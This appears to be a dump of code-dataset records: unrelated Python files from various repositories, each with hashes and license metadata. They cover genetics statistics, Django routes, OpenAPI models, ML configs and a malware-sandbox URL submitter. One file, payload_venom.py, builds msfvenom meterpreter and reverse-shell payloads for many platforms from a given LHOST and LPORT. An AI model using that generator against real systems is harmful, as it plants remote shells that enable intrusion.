int(np.array(s_star_snps_pos)[np.equal(hap[index],1)][0]) return hap_pos_min, hap_pos_max, hap_num #@profile def _query_ref_match_pct_naive(ref_match_pct, hap_stats, mapped_len_esp, len_esp, var_esp, sfs_esp): """ Description: Helper function for querying match percents from the reference population consistent with statistics from a given haplotype using Python dictionary. Arguments: ref_match_pct dict: Dictionary containing match percents from the reference population. hap_stats list: List containing statistics from a haplotype. mapped_len_esp float: Increment of the length of the mapped region. len_esp float: Increment of the length of the haplotype. var_esp float: Increment of the number of derived alleles on the haplotype. sfs_esp float: Increment of mean site frequency spectrum. Returns: res list: List containing match percents from the reference population. """ res = [] mapped_len = hap_stats[2] hap_len = hap_stats[1] hap_site = hap_stats[-3] hap_var = hap_stats[0] sfs = hap_stats[-2] if (mapped_len == 'NA') or (hap_len == 'NA') or (hap_var == 'NA') or (sfs == 'NA'): return res mapped_len_start = mapped_len - mapped_len_esp mapped_len_end = mapped_len + mapped_len_esp len_start = hap_len - len_esp len_end = hap_len + len_esp var_start = hap_var - var_esp var_end = hap_var + var_esp sfs_start = sfs - sfs_esp sfs_end = sfs + sfs_esp for mapped_len in ref_match_pct.keys(): if (mapped_len >= mapped_len_start) and (mapped_len <= mapped_len_end): for hap_len in ref_match_pct[mapped_len].keys(): if (hap_len >= len_start) and (hap_len <= len_end): for hap_var in ref_match_pct[mapped_len][hap_len].keys(): if (hap_var >= var_start) and (hap_var <= var_end): for sfs in ref_match_pct[mapped_len][hap_len][hap_var].keys(): if (sfs >= sfs_start) and (sfs <= sfs_end): for e in zip(ref_match_pct[mapped_len][hap_len][hap_var][sfs]['match_pct'], ref_match_pct[mapped_len][hap_len][hap_var][sfs]['count']): res += [e[0]] * e[1] return res #@profile def _query_ref_match_pct_pandas(df, hap_stats, mapped_len_esp, len_esp, var_esp, sfs_esp): """ Description: Helper function for querying match percents from the reference population consistent with statistics from a given haplotype using the polars package. Arguments: ref_match_pct dict: Dictionary containing match percents from the reference population. hap_stats list: List containing statistics from a haplotype. mapped_len_esp float: Increment of the length of the mapped region. len_esp float: Increment of the length of the haplotype. var_esp float: Increment of the number of derived alleles on the haplotype. sfs_esp float: Increment of mean site frequency spectrum. Returns: res list: List containing match percents from the reference population. """ res = [] mapped_len = hap_stats[2] hap_len = hap_stats[1] hap_site = hap_stats[-3] hap_var = hap_stats[0] sfs = hap_stats[-2] if (mapped_len == 'NA') or (hap_len == 'NA') or (hap_var == 'NA') or (sfs == 'NA'): return res mapped_len_start = mapped_len - mapped_len_esp mapped_len_end = mapped_len + mapped_len_esp len_start = hap_len - len_esp len_end = hap_len + len_esp var_start = hap_var - var_esp var_end = hap_var + var_esp sfs_start = sfs - sfs_esp sfs_end = sfs + sfs_esp counts = df[(df['hap_len'] >= len_start) & (df['hap_len'] <= len_end) & (df['hap_mapped_len_bin'] >= mapped_len_start) & (df['hap_mapped_len_bin'] <= mapped_len_end) & (df['hap_match_num'] >= var_start)& (df['hap_match_num'] <= var_end) & (df['hap_dSNP_per_site_num'] >= sfs_start) & (df['hap_dSNP_per_site_num'] <= sfs_end)] matches = counts['match_pct'].values counts = counts['count'].values for i in range(len(counts)): res += [matches[i]] * counts[i] return res #@profile def _cal_pvalue(ref_match_pct, hap_match_pct): """ Description: Helper function to calculate a p-value for a given match percent. Arguments: ref_match_pct list: Match percents from reference populations as the null distribution. hap_match_pct float: Match percent of a haplotype in a window. Returns: pvalue float: P-value for the significance of the match percent. """ if (ref_match_pct is None) or (len(ref_match_pct) == 0): return 'NA' if hap_match_pct == 0: return 1.0 if hap_match_pct == 'NA': return 'NA' count = len([r for r in ref_match_pct if hap_match_pct <= round(r, 6)]) pvalue = count / len(ref_match_pct) pvalue = round(pvalue, 6) return pvalue #@profile def _cal_pvalue_ind(data, tgt_ind_index, mapped_intervals, tgt_data, src_data, src_samples, ref_match_pct, sample_size, query_ref_match_pct, mapped_len_esp, len_esp, var_esp, sfs_esp): """ Description: Helper function for calculating p-values in individuals. Arguments: data dict: Dictionary containing S* for analysis. tgt_ind_index int: Index of the target individual for analysis. mapped_intervals dict: Dictionary of tuples containing mapped regions across the genome. tgt_data dict: Genotype data from target populations. src_data dict: Genotype data from source populations. src_samples list: List of samples from source populations. ref_match_pct dict: Dictionary containing match percents from the reference population. sample_size int: Number of individuals analyzed. query_ref_match_pct func: Function used to query match percentages from reference popualtions. mapped_len_esp float: Increment of the length of the mapped region. len_esp float: Increment of the length of the haplotype. var_esp float: Increment of the number of derived alleles on the haplotype. sfs_esp float: Increment of mean site frequency spectrum. Returns: res list: List containing estimated p-values and other statistics. """ res = [] for line in data: elements = line.split("\t") chr_name = elements[0] win_start, win_end = elements[1], elements[2] sample = elements[3] s_star_snps = elements[-1].split(",") s_start, s_end = s_star_snps[0], s_star_snps[-1] key1 = win_start+'-'+win_end key2 = s_start+'-'+s_end for src_ind_index in range(len(src_samples)): # Results using SNPs within S* SNPs src_sample = src_samples[src_ind_index] hap1_s_start, hap1_s_end, hap1_s_num = _get_ssnps_range(chr_name, tgt_data, tgt_ind_index, 0, int(win_start), int(win_end), s_star_snps) hap2_s_start, hap2_s_end, hap2_s_num = _get_ssnps_range(chr_name, tgt_data, tgt_ind_index, 1, int(win_start), int(win_end), s_star_snps) hap1_star_res = cal_match_pct(chr_name, mapped_intervals, tgt_data, src_data, tgt_ind_index, src_ind_index, 0, hap1_s_start, hap1_s_end, sample_size) hap2_star_res = cal_match_pct(chr_name, mapped_intervals, tgt_data, src_data, tgt_ind_index, src_ind_index, 1, hap2_s_start, hap2_s_end, sample_size) hap1_star_match_pct = hap1_star_res[-1] hap2_star_match_pct = hap2_star_res[-1] ref_match_pct3 = query_ref_match_pct(ref_match_pct, hap1_star_res, mapped_len_esp, len_esp, var_esp, sfs_esp) ref_match_pct4 = query_ref_match_pct(ref_match_pct, hap2_star_res, mapped_len_esp, len_esp, var_esp, sfs_esp) hap1_star_match_pvalue = _cal_pvalue(ref_match_pct3, hap1_star_match_pct) hap2_star_match_pvalue = _cal_pvalue(ref_match_pct4, hap2_star_match_pct) hap1_num_match_ref = 'NA' hap2_num_match_ref = 'NA' if ref_match_pct3 is not None: hap1_num_match_ref = len(ref_match_pct3) if ref_match_pct4 is not None: hap2_num_match_ref = len(ref_match_pct4) line1 = f'{chr_name}\t{win_start}\t{win_end}\t{sample}\t{hap1_star_match_pvalue}\t' line1 += f'{src_sample}\t1\t{hap1_s_start}\t{hap1_s_end}\t{hap1_s_num}\t' line1 += "\t".join([str(r) for r in hap1_star_res]) + f"\t{hap1_num_match_ref}" line2 = f'{chr_name}\t{win_start}\t{win_end}\t{sample}\t{hap2_star_match_pvalue}\t' line2 += f'{src_sample}\t2\t{hap2_s_start}\t{hap2_s_end}\t{hap2_s_num}\t' line2 += "\t".join([str(r) for r in hap2_star_res]) + f"\t{hap2_num_match_ref}" res.append(line1) res.append(line2) return res
45.904564
329
0.688963
795ab3cd1e8b3e197c0f3913cce9aa11b2269378
183
py
Python
toys/urls.py
Zoki92/DRF-toys
e0f59f5fecd94035eb0dc68dbd1e9e4591b344dc
[ "MIT" ]
null
null
null
toys/urls.py
Zoki92/DRF-toys
e0f59f5fecd94035eb0dc68dbd1e9e4591b344dc
[ "MIT" ]
null
null
null
toys/urls.py
Zoki92/DRF-toys
e0f59f5fecd94035eb0dc68dbd1e9e4591b344dc
[ "MIT" ]
null
null
null
from django.urls import path from . import views urlpatterns = [ path('toys/', views.toy_list, name="toy_list"), path('toys/<int:pk>', views.toy_detail, name="toy_detail") ]
22.875
62
0.68306
795ab4c1cd6f5c2176a3699585b063847054041a
1,624
py
Python
openapi_core/schema/media_types/models.py
badcure/openapi-core
d369076bd135146c131cf0c92dab77f60d2571a5
[ "BSD-3-Clause" ]
null
null
null
openapi_core/schema/media_types/models.py
badcure/openapi-core
d369076bd135146c131cf0c92dab77f60d2571a5
[ "BSD-3-Clause" ]
null
null
null
openapi_core/schema/media_types/models.py
badcure/openapi-core
d369076bd135146c131cf0c92dab77f60d2571a5
[ "BSD-3-Clause" ]
null
null
null
"""OpenAPI core media types models module""" from collections import defaultdict from json import loads from openapi_core.schema.media_types.exceptions import InvalidMediaTypeValue from openapi_core.schema.schemas.exceptions import OpenAPISchemaError MEDIA_TYPE_DESERIALIZERS = { 'application/json': loads, } class MediaType(object): """Represents an OpenAPI MediaType.""" def __init__(self, mimetype, schema=None, example=None): self.mimetype = mimetype self.schema = schema self.example = example def get_deserializer_mapping(self): mapping = MEDIA_TYPE_DESERIALIZERS.copy() return defaultdict(lambda: lambda x: x, mapping) def get_dererializer(self): mapping = self.get_deserializer_mapping() return mapping[self.mimetype] def deserialize(self, value): deserializer = self.get_dererializer() return deserializer(value) def unmarshal(self, value, custom_formatters=None, read=False, write=False): if not self.schema: return value try: deserialized = self.deserialize(value) except ValueError as exc: raise InvalidMediaTypeValue(exc) try: unmarshalled = self.schema.unmarshal(deserialized, custom_formatters=custom_formatters) except OpenAPISchemaError as exc: raise InvalidMediaTypeValue(exc) try: return self.schema.validate(unmarshalled, custom_formatters=custom_formatters, read=read, write=write) except OpenAPISchemaError as exc: raise InvalidMediaTypeValue(exc)
30.641509
114
0.696429
795ab522e57fb2bcd9651e2a561bd85697d937b8
2,011
py
Python
src/payload_venom.py
darkracer3010/Networcked
8b7ce0d465e6818dc08f57e643b0cef43f314c0f
[ "MIT" ]
1
2022-02-25T09:03:06.000Z
2022-02-25T09:03:06.000Z
src/payload_venom.py
darkracer3010/Networcked
8b7ce0d465e6818dc08f57e643b0cef43f314c0f
[ "MIT" ]
1
2021-11-27T06:52:46.000Z
2021-11-27T06:52:46.000Z
src/payload_venom.py
darkracer3010/Networcked
8b7ce0d465e6818dc08f57e643b0cef43f314c0f
[ "MIT" ]
4
2021-11-27T06:45:24.000Z
2022-02-25T09:03:08.000Z
import os from subprocess import PIPE, run import time def command(cmd): return run(cmd, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True) payloads={ "linux":"msfvenom -p linux/x86/meterpreter/reverse_tcp", "windows": "msfvenom -p windows/meterpreter/reverse_tcp ", "mac":"msfvenom -p osx/x86/shell_reverse_tcp LHOST=ip_address ", "php" : "msfvenom -p php/meterpreter_reverse_tcp ", "asp" : "msfvenom -p windows/meterpreter/reverse_tcp ", "jsp" : "msfvenom -p java/jsp_shell_reverse_tcp ", "war" : "msfvenom -p java/jsp_shell_reverse_tcp ", "python" : "msfvenom -p cmd/unix/reverse_python ", "bash" : "msfvenom -p cmd/unix/reverse_bash ", "perl" : "msfvenom -p cmd/unix/reverse_perl ", } extentions={ "linux" : " -f elf > shell.elf", "windows" : " -f exe > shell.exe", "mac" : " -f macho > shell.macho", "php" : " -f raw > shell.php", "asp" : " -f asp > shell.asp", "jsp" : " -f raw > shell.jsp", "war" : " -f war > shell.war", "python" : " -f raw > shell.py", "bash" : " -f raw > shell.sh", "perl" : " -f raw > shell.pl", } def payloads_msf(a): #netw --payload linux/python/etc lhost lport a=a.split() if "netw" in a: if "--payload" in a: RED='\033[0;31m' NC='\033[0m' green='\033[0;32m' cyan='\033[0;36m' orange='\033[0;33m' purple='\033[0;35m' print() os.system("echo '\033[0;31m [Starting] \033[0m Loading The Modules...'") print() time.sleep(1) os.system("echo '\033[0;31m [Initializing] \033[0m Starting The Payload...'") time.sleep(1) print() os.system("echo '\033[0;31m [Retrieving the Data] \033[0m Almost there.....'") print() time.sleep(1) os.system("echo '\033[0;32m [Got The Info !!] \033'") print() try: data=payloads[a[2]] host=" LHOST="+str(a[3]) port=" LPORT="+str(a[4]) print(data+host+port+extentions[a[2]]) command(data+host+port+extentions[a[2]]) except: print("Module Not Found!\n") # a=input("Enter Your Command: ").split() # payloads_msf(a)
27.930556
83
0.622079
795ab563a1b7b0c6da4a6361c293b5ee79ccbc9b
6,342
py
Python
PyDSS/pyPlots/Plots/Table.py
dvaidhyn/PyDSS
0d220d00900da4945e2ab6e7774de5edb58b36a9
[ "BSD-3-Clause" ]
21
2019-02-04T22:19:50.000Z
2022-03-01T18:06:28.000Z
PyDSS/pyPlots/Plots/Table.py
dvaidhyn/PyDSS
0d220d00900da4945e2ab6e7774de5edb58b36a9
[ "BSD-3-Clause" ]
33
2020-01-28T22:47:44.000Z
2022-03-30T20:05:00.000Z
PyDSS/pyPlots/Plots/Table.py
dvaidhyn/PyDSS
0d220d00900da4945e2ab6e7774de5edb58b36a9
[ "BSD-3-Clause" ]
11
2019-12-28T01:04:55.000Z
2022-03-01T18:05:30.000Z
from PyDSS.pyPlots.pyPlotAbstract import PlotAbstract from bokeh.plotting import figure, curdoc from bokeh.io import output_file from bokeh.models import ColumnDataSource, ColorBar, \ LinearColorMapper, HoverTool, BoxSelectTool, BoxZoomTool, \ PanTool, WheelZoomTool, ResetTool, SaveTool, Label from bokeh.palettes import Plasma from bokeh.client import push_session import pandas as pd import numpy as np class Table(PlotAbstract): def __init__(self,PlotProperties, dssBuses, dssObjects, dssCircuit, dssSolver): super(Table).__init__() self.__dssBuses = dssBuses self.__dssObjs = dssObjects self.__dssCircuit = dssCircuit self.__PlotProperties = PlotProperties self.xMul = PlotProperties['xScaler'] self.yMul = PlotProperties['yScaler'] self.cMul = PlotProperties['cScaler'] self.xInd = PlotProperties['xindex'] self.yInd = PlotProperties['yindex'] self.cInd = PlotProperties['cindex'] self.xObj = self.getObject(PlotProperties['xObjName'],PlotProperties['xObjectType']) self.yObj = self.getObject(PlotProperties['yObjName'],PlotProperties['yObjectType']) self.cObj = self.getObject(PlotProperties['cObjName'],PlotProperties['cObjectType']) output_file(PlotProperties['FileName']) xVal = self.getObjectValue(self.xObj, PlotProperties['xObjectType'], PlotProperties['xProperty'], self.xInd, self.xMul) yVal = self.getObjectValue(self.yObj, PlotProperties['yObjectType'], PlotProperties['yProperty'], self.yInd, self.yMul) cVal = self.getObjectValue(self.cObj, PlotProperties['cObjectType'], PlotProperties['cProperty'], self.cInd, self.cMul) self.xVals = [xVal] self.yVals = [yVal] self.cVals = [cVal] Data = pd.DataFrame(np.transpose([self.xVals, self.yVals, self.cVals]), columns=['X', 'Y', 'C']) ColorArray = self.GetColorArray(Data['C'].astype(float), Plasma[256]) self.__Figure = figure(plot_width=self.__PlotProperties['Width'], plot_height=self.__PlotProperties['Height'], title= 'XY Plot: Color - ' + PlotProperties['cObjName'] + ' - ' + PlotProperties['cProperty']) self.ScatterPlot = self.__Figure.scatter(x= Data['X'], y=Data['Y'], fill_color=Plasma[256][1], fill_alpha=0.6, line_color=None, size=7) self.__Figure.yaxis.axis_label = PlotProperties['yObjName'] + ' - ' + PlotProperties['yProperty'] self.__Figure.xaxis.axis_label = PlotProperties['xObjName'] + ' - ' + PlotProperties['xProperty'] self.doc = curdoc() self.doc.add_root(self.__Figure) self.doc.title = "PyDSS" self.session = push_session(self.doc) #self.session.show(self.__Figure) # open the document in a browser return def GetSessionID(self): return self.session.id def GetColorArray(self, DataSeries, Pallete): if len(DataSeries)> 10: nBins = len(Pallete) minVal = min(DataSeries) maxVal = max(DataSeries) bins = np.arange(minVal, maxVal, (maxVal-minVal)/(nBins+1)) nBinEdges = len(bins) if nBinEdges - nBins > 1: bins = bins[:nBins+1] ColorArray = pd.cut(DataSeries, bins, labels=Pallete) ColorArray = ColorArray.replace(np.nan, Pallete[-1], regex=True) ColorArray = ColorArray.tolist() else: ColorArray = Pallete[0] return ColorArray def getObjectValue(self, Obj, ObjType, ObjPpty, Index, Multiplier): pptyType, Property = ObjPpty.split('.') if pptyType == 'p': pptyValue = float(Obj.GetParameter(Property)) elif pptyType == 'v' and ObjType != 'Circuit': pptyValue = Obj.GetVariable(Property) elif pptyType == 'v' and ObjType == 'Circuit': pptyValue = getattr(Obj, Property)() if pptyValue is not None: if isinstance(pptyValue, list): if Index.lower() == 'sumeven': result = Multiplier * sum(pptyValue[::2]) elif Index.lower() == 'sumodd': result = Multiplier * sum(pptyValue[1::2]) elif Index.lower() == 'even': result = [[Multiplier * x] for x in pptyValue[::2]] elif Index.lower() == 'odd': result = [[Multiplier * x] for x in pptyValue[1::2]] elif 'Index=' in Index: c = int(Index.replace('Index=', '')) result = Multiplier * pptyValue[c] else: result = Multiplier * pptyValue return result def getObject(self, ObjName, ObjType): if ObjType == 'Element': Obj = self.__dssObjs[ObjName] elif ObjType == 'Bus': Obj = self.__dssBuses[ObjName] elif ObjType == 'Circuit': Obj = self.__dssCircuit else: Obj = None return Obj def UpdatePlot(self): xVal = self.getObjectValue(self.xObj, self.__PlotProperties['xObjectType'], self.__PlotProperties['xProperty'], self.xInd, self.xMul) yVal = self.getObjectValue(self.yObj, self.__PlotProperties['yObjectType'], self.__PlotProperties['yProperty'], self.yInd, self.yMul) cVal = self.getObjectValue(self.cObj, self.__PlotProperties['cObjectType'], self.__PlotProperties['cProperty'], self.cInd, self.cMul) self.xVals.append(xVal) self.yVals.append(yVal) self.cVals.append(cVal) Data = pd.DataFrame(np.transpose([self.xVals, self.yVals, self.cVals]), columns=['X', 'Y', 'C']) Data = Data.sort_values('X') Data = Data.drop_duplicates(subset=Data.columns) #ColorArray = self.GetColorArray(Data['X'].astype(float), Plasma[256]) self.ScatterPlot.data_source.data['x'] = Data['X'] self.ScatterPlot.data_source.data['y'] = Data['Y'] #self.ScatterPlot
42.851351
119
0.589089
795ab614a18a26e54d9f13a67016cc1b5f90f94d
1,066
py
Python
setup.py
arita37/fast-bert
f07782873031db440e60b2c55d5a9dbab53e01a9
[ "Apache-2.0" ]
1
2019-10-08T03:01:04.000Z
2019-10-08T03:01:04.000Z
setup.py
alberduris/fast-bert
f07782873031db440e60b2c55d5a9dbab53e01a9
[ "Apache-2.0" ]
null
null
null
setup.py
alberduris/fast-bert
f07782873031db440e60b2c55d5a9dbab53e01a9
[ "Apache-2.0" ]
null
null
null
from io import open from setuptools import setup, find_packages # from pip.req import parse_requirements with open('requirements.txt') as f: install_requires = f.read().strip().split('\n') setup(name='fast_bert', version='1.4.2', description='AI Library using BERT', author='Kaushal Trivedi', author_email='kaushaltrivedi@me.com', license='Apache2', url='https://github.com/kaushaltrivedi/fast-bert', long_description=open("README.md", "r", encoding='utf-8').read(), long_description_content_type="text/markdown", keywords='BERT NLP deep learning google', packages=find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"]), install_requires=install_requires, classifiers=[ 'Intended Audience :: Science/Research', 'License :: OSI Approved :: Apache Software License', 'Programming Language :: Python :: 3', 'Topic :: Scientific/Engineering :: Artificial Intelligence', ], zip_safe=False)
38.071429
71
0.63227
795ab6f67f74be07bd98ad828b074f51b1615205
3,021
py
Python
paloalto_wildfire/komand_paloalto_wildfire/actions/submit_url/action.py
killstrelok/insightconnect-plugins
911358925f4233ab273dbd8172e8b7b9188ebc01
[ "MIT" ]
null
null
null
paloalto_wildfire/komand_paloalto_wildfire/actions/submit_url/action.py
killstrelok/insightconnect-plugins
911358925f4233ab273dbd8172e8b7b9188ebc01
[ "MIT" ]
1
2021-02-23T23:57:37.000Z
2021-02-23T23:57:37.000Z
paloalto_wildfire/komand_paloalto_wildfire/actions/submit_url/action.py
killstrelok/insightconnect-plugins
911358925f4233ab273dbd8172e8b7b9188ebc01
[ "MIT" ]
null
null
null
import komand from .schema import SubmitUrlInput, SubmitUrlOutput # Custom imports below from komand.exceptions import PluginException import requests import xmltodict class SubmitUrl(komand.Action): def __init__(self): super(self.__class__, self).__init__( name='submit_url', description='Submit a URL for analysis', input=SubmitUrlInput(), output=SubmitUrlOutput()) def run(self, params={}): """TODO: Run action""" endpoint = "/publicapi/submit/link" client = self.connection.client url = 'https://{}{}'.format(self.connection.host, endpoint) # Formatted with None and tuples so requests sends form-data properly # => Send data, 299 bytes (0x12b) # 0000: --------------------------8557684369749613 # 002c: Content-Disposition: form-data; name="apikey" # 005b: # 005d: 740219c8fab2606b9206b2d40626b2d1 # 007f: --------------------------8557684369749613 # 00ab: Content-Disposition: form-data; name="format" # 00d8: # 00da: pdf # 00fd: --------------------------8557684369749613-- # ... req = { 'apikey': (None, self.connection.api_key), 'link': (None, params.get('url')), } try: r = requests.post(url, files=req) o = xmltodict.parse(r.content) out = dict(o) #self.logger.info(out) #{ # "submission": { # "error": { # "error-message": "'Invalid webpage type url, url should start with http or https'" # } # } #} if 'submission' in out: if 'error' in out['submission']: if 'error-message' in out['submission']['error']: error = out['submission']['error']['error-message'] raise PluginException(cause='Received an error response from Wildfire.', assistance=f'{error}.') # A different response occurs sometimes # {'error': OrderedDict([('error-message', "'Invalid webpage type url, url should start with http or https'")])} if 'error' in out: if 'error-message' in out['error']: error = out['error']['error-message'] raise PluginException(cause='Received an error response from Wildfire.', assistance=f'{error}.') else: self.logger.info(out) raise PluginException(cause='Received an error response from Wildfire.', assistance="Check the log output for more details.") out = dict(o['wildfire']['submit-link-info']) except: raise return { 'submission': out } def test(self): """TODO: Test action""" client = self.connection.client return { 'submission': { 'url': 'Test', 'sha256': 'Test', 'md5': 'Test' } }
37.296296
143
0.53095
795ab81608916bd29341868a2b5dd55c44969d26
239
py
Python
jython_ex.py
CenterLineM/PythonPon
ca6a29ec10b095684e90cfcfbf6e0ac1cb5eabe3
[ "Apache-2.0" ]
null
null
null
jython_ex.py
CenterLineM/PythonPon
ca6a29ec10b095684e90cfcfbf6e0ac1cb5eabe3
[ "Apache-2.0" ]
null
null
null
jython_ex.py
CenterLineM/PythonPon
ca6a29ec10b095684e90cfcfbf6e0ac1cb5eabe3
[ "Apache-2.0" ]
null
null
null
__author__ = 'Administrator' import java from java import awt def exit(e): java.lang.System.exit(0) frame = awt.Frame('AWT Example', visible=1) button = awt.Button('Close Me!', actionPerformed=exit) frame.add(button, 'Center') frame.pack()
29.875
54
0.74477
795ab837e6ce3690a93ee4bd0861128438c59bcb
388
py
Python
_tbnf/fable_modules/fable_library/task.py
thautwarm/Typed-BNF
897a4a2bd389dcb2ca16c6c773b28f0388336f63
[ "MIT" ]
38
2022-01-01T06:45:27.000Z
2022-03-20T14:18:38.000Z
_tbnf/fable_modules/fable_library/task.py
thautwarm/typed-bnf
b5694a34fe21a064250f2ef88745d8ebad51eb33
[ "MIT" ]
7
2021-09-17T16:46:50.000Z
2021-12-31T20:49:35.000Z
_tbnf/fable_modules/fable_library/task.py
thautwarm/typed-bnf
b5694a34fe21a064250f2ef88745d8ebad51eb33
[ "MIT" ]
3
2022-01-01T07:33:44.000Z
2022-01-09T11:41:33.000Z
from typing import Awaitable, TypeVar, Any import asyncio T = TypeVar("T") async def zero() -> None: return async def from_result(value: Any) -> Any: return value def get_awaiter(value: Awaitable[T]) -> Awaitable[T]: return value def get_result(value: Awaitable[T]) -> T: return asyncio.run(value) __all__ = ["get_awaiter", "get_result", "from_result", "zero"]
16.166667
62
0.677835
795ab990f2e60ef09bf1ab9b2edab34bc0866509
2,211
py
Python
tmp_cfg/cfgs_cityscapes_resnet101os16.py
zhizhangxian/sssegmentation
90613f6e0abf4cdd729cf382ab2a915e106d8649
[ "MIT" ]
1
2021-05-28T06:42:37.000Z
2021-05-28T06:42:37.000Z
tmp_cfg/cfgs_cityscapes_resnet101os16.py
zhizhangxian/sssegmentation
90613f6e0abf4cdd729cf382ab2a915e106d8649
[ "MIT" ]
null
null
null
tmp_cfg/cfgs_cityscapes_resnet101os16.py
zhizhangxian/sssegmentation
90613f6e0abf4cdd729cf382ab2a915e106d8649
[ "MIT" ]
null
null
null
'''define the config file for cityscapes and resnet101os16''' from .base_cfg import * # modify dataset config DATASET_CFG = DATASET_CFG.copy() DATASET_CFG['train'].update( { 'type': 'cityscapes', 'rootdir': 'data/CityScapes', 'aug_opts': [('Resize', {'output_size': (2048, 1024), 'keep_ratio': True, 'scale_range': (0.5, 2.0)}), ('RandomCrop', {'crop_size': (512, 1024), 'one_category_max_ratio': 0.75}), ('RandomFlip', {'flip_prob': 0.5}), ('PhotoMetricDistortion', {}), ('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}), ('ToTensor', {}), ('Padding', {'output_size': (512, 1024), 'data_type': 'tensor'}),] } ) DATASET_CFG['test'].update( { 'type': 'cityscapes', 'rootdir': 'data/CityScapes', 'aug_opts': [('Resize', {'output_size': (2048, 1024), 'keep_ratio': True, 'scale_range': None}), ('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}), ('ToTensor', {}),], } ) # modify dataloader config DATALOADER_CFG = DATALOADER_CFG.copy() DATALOADER_CFG['train'].update( { 'batch_size': 8, } ) # modify optimizer config OPTIMIZER_CFG = OPTIMIZER_CFG.copy() OPTIMIZER_CFG.update( { 'max_epochs': 220 } ) # modify losses config LOSSES_CFG = LOSSES_CFG.copy() # modify model config MODEL_CFG = MODEL_CFG.copy() MODEL_CFG.update( { 'num_classes': 19, } ) # modify inference config INFERENCE_CFG = INFERENCE_CFG.copy() # modify common config COMMON_CFG = COMMON_CFG.copy() COMMON_CFG['train'].update( { 'backupdir': 'deeplabv3plus_resnet101os16_cityscapes_train', 'logfilepath': 'deeplabv3plus_resnet101os16_cityscapes_train/train.log', } ) COMMON_CFG['test'].update( { 'backupdir': 'deeplabv3plus_resnet101os16_cityscapes_test', 'logfilepath': 'deeplabv3plus_resnet101os16_cityscapes_test/test.log', 'resultsavepath': 'deeplabv3plus_resnet101os16_cityscapes_test/deeplabv3plus_resnet101os16_cityscapes_results.pkl' } )
32.514706
122
0.606061
795ab99dc2cb92e9a86411e8a4d83a0965fa9e14
1,059
py
Python
google/ads/googleads/v6/services/services/user_interest_service/transports/__init__.py
wxxlouisa/google-ads-python
f24137966f6bfcb765a9b1fae79f2d23041825fe
[ "Apache-2.0" ]
null
null
null
google/ads/googleads/v6/services/services/user_interest_service/transports/__init__.py
wxxlouisa/google-ads-python
f24137966f6bfcb765a9b1fae79f2d23041825fe
[ "Apache-2.0" ]
null
null
null
google/ads/googleads/v6/services/services/user_interest_service/transports/__init__.py
wxxlouisa/google-ads-python
f24137966f6bfcb765a9b1fae79f2d23041825fe
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from collections import OrderedDict from typing import Dict, Type from .base import UserInterestServiceTransport from .grpc import UserInterestServiceGrpcTransport # Compile a registry of transports. _transport_registry = ( OrderedDict() ) # type: Dict[str, Type[UserInterestServiceTransport]] _transport_registry["grpc"] = UserInterestServiceGrpcTransport __all__ = ( "UserInterestServiceTransport", "UserInterestServiceGrpcTransport", )
29.416667
74
0.769594
795ab9b13215165462200a7216b80f27410e936d
7,779
py
Python
cnn_conv_pool.py
MasazI/DeepLearning
f0658aeddab9517db67f3d36ae831c6fed62aae9
[ "MIT" ]
1
2018-08-30T06:42:30.000Z
2018-08-30T06:42:30.000Z
cnn_conv_pool.py
MasazI/DeepLearning
f0658aeddab9517db67f3d36ae831c6fed62aae9
[ "MIT" ]
null
null
null
cnn_conv_pool.py
MasazI/DeepLearning
f0658aeddab9517db67f3d36ae831c6fed62aae9
[ "MIT" ]
null
null
null
#coding: utf-8 import theano import theano.tensor as T from theano.tensor.nnet import conv from theano.tensor.signal import downsample from logistic_regression import load_data, LogisticRegression from multilayer_perceptron import HiddenLayer import function_util as func import numpy as np import timeit import os import sys # 畳込み層 class ConvLayer(object): def __init__(self, rng, input, image_shape, filter_shape): # 入力のチャンネル数とフィルタを定義するときに指定する入力のチャンネル数の一致を確認 assert image_shape[1] == filter_shape[1] # 入力の保存 self.input = input # 黒魔術的なfilterの初期化 # フィルターマップ数 * フィルターのheight * フィルターのwidth (prodはnpの配列要素全部の掛け算) fan_in = np.prod(filter_shape[1:]) # 出力特徴Map数 * フィルターのheight * フィルターのwidth fan_out = filter_shape[0] * np.prod(filter_shape[2:]) # filterの定義 W_bound = np.sqrt(6./ (fan_in + fan_out)) # ランダムな値を割り振る self.W = theano.shared(np.asarray(rng.uniform(low=-W_bound, high=W_bound, size=filter_shape), dtype=theano.config.floatX), borrow=True) # biasの定義 b_values = np.zeros((filter_shape[0],), dtype=theano.config.floatX) self.b = theano.shared(value=b_values, borrow=True) # conv conv_out = conv.conv2d(input=input, filters=self.W, filter_shape=filter_shape, image_shape=image_shape) # biasとactivate function # poolingの結果にbias項として加える(全項に追加) # biasは1dimのvectorなので(1, n_filters, 1, 1)にreshapeする # biasを加えたら、activate function(ここではtanh)を適用する self.output = func.sym_ReLU(conv_out + self.b.dimshuffle('x', 0, 'x', 'x')) # パラメータの保存 self.params = [self.W, self.b] # 入力の保存 self.input = input # プーリング層 class PoolLayer(object): def __init__(self, input, poolsize=(2,2)): # pooling self.input = input pooled_out = downsample.max_pool_2d(input=input, ds=poolsize, ignore_border=True) self.output = pooled_out def optimize_cnn_lenet(learning_rate=0.01, n_epochs=200, dataset='data/mnist.pkl.gz', batch_size=500, n_hidden=500, nkerns=[20, 50], rng=np.random.RandomState(23455)): print '... load training set' datasets = load_data(dataset) train_set_x, train_set_y = datasets[0] valid_set_x, valid_set_y = datasets[1] test_set_x, test_set_y = datasets[2] n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] / batch_size n_test_batches = test_set_x.get_value(borrow=True).shape[0] / batch_size # ミニバッチのindex index = T.lscalar() # dataシンボル x = T.matrix('x') # labelシンボル y = T.ivector('y') print '... building the model' # LeNetConvPoolLayerと矛盾が起きないように、(batch_size, 28*28)にラスタ化された行列を4DTensorにリシェイプする # 